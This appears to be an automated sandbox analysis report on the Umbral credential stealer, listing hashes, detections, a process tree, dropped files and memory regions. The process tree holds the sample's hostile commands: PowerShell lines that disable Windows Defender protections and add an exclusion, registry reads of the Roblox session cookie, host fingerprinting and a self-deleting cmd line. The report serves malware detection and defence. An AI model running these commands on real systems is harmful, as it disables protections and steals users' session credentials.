Analysis

  • max time kernel
    140s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-08-2024 01:54

General

  • Target

    5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe

  • Size

    229KB

  • MD5

    eabe2a81aa3dabab25e49ee4b36ce075

  • SHA1

    f55b6298f0a8330d90d39e20a73adb2e828dfd1c

  • SHA256

    5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686

  • SHA512

    9688119150d3a466d9a12bfc55933d367104747a2cf319467a78dfcf975361c9e2727f76efe380db9d0c92c39dc4b0241bfb444e965e92720c9edcf42c1d18fe

  • SSDEEP

    6144:lloZM+rIkd8g+EtXHkv/iD4Wn0IZHMgPou35EwFyov28e1mpi:noZtL+EP8Wn0IZHMgPou35EwFm1

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe
    "C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:5008
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4060
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe"
      2⤵
      • Views/modifies file attributes
      PID:1244
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3676
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1752
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4356
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:4856
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:228
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:4372
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:4320
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:1176
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\5b97b5644019cec44dded172780f30b049b82c8e8582a589ce95d7dec421a686.exe" && pause
          2⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:680
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4788

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        6d3e9c29fe44e90aae6ed30ccf799ca8

        SHA1

        c7974ef72264bbdf13a2793ccf1aed11bc565dce

        SHA256

        2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

        SHA512

        60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        966914e2e771de7a4a57a95b6ecfa8a9

        SHA1

        7a32282fd51dd032967ed4d9a40cc57e265aeff2

        SHA256

        98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

        SHA512

        dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        88be3bc8a7f90e3953298c0fdbec4d72

        SHA1

        f4969784ad421cc80ef45608727aacd0f6bf2e4b

        SHA256

        533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

        SHA512

        4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        cf1b06b44fb8bc1a4f25c85e70937782

        SHA1

        c4adeae41a97fc11d407c398040dd109873fb2e5

        SHA256

        04ddc18714503a6c256830af58a731df9d9ad479e87663787e0fa92424c9b743

        SHA512

        07fcfc741b14ef3551fdc53a08e31020fd9e1d43ab637535a11e318c9f8d48ea37cae3913539838e74299952a868a7824982ad5dc887992686d45050cc1fc7cf

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fdlvrtqz.vwq.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2444-4-0x00007FFCC79E0000-0x00007FFCC84A1000-memory.dmp

        Filesize

        10.8MB

      • memory/2444-5-0x00007FFCC79E0000-0x00007FFCC84A1000-memory.dmp

        Filesize

        10.8MB

      • memory/2444-8-0x000002193A850000-0x000002193A872000-memory.dmp

        Filesize

        136KB

      • memory/2444-18-0x00007FFCC79E0000-0x00007FFCC84A1000-memory.dmp

        Filesize

        10.8MB

      • memory/2444-3-0x00007FFCC79E0000-0x00007FFCC84A1000-memory.dmp

        Filesize

        10.8MB

      • memory/5008-34-0x000001BB6DFB0000-0x000001BB6E000000-memory.dmp

        Filesize

        320KB

      • memory/5008-33-0x000001BB6DEE0000-0x000001BB6DF56000-memory.dmp

        Filesize

        472KB

      • memory/5008-35-0x000001BB6D3B0000-0x000001BB6D3CE000-memory.dmp

        Filesize

        120KB

      • memory/5008-1-0x000001BB6B730000-0x000001BB6B770000-memory.dmp

        Filesize

        256KB

      • memory/5008-0-0x00007FFCC79E3000-0x00007FFCC79E5000-memory.dmp

        Filesize

        8KB

      • memory/5008-71-0x000001BB6D3F0000-0x000001BB6D3FA000-memory.dmp

        Filesize

        40KB

      • memory/5008-72-0x000001BB6DE60000-0x000001BB6DE72000-memory.dmp

        Filesize

        72KB

      • memory/5008-2-0x00007FFCC79E0000-0x00007FFCC84A1000-memory.dmp

        Filesize

        10.8MB

      • memory/5008-90-0x00007FFCC79E0000-0x00007FFCC84A1000-memory.dmp

        Filesize

        10.8MB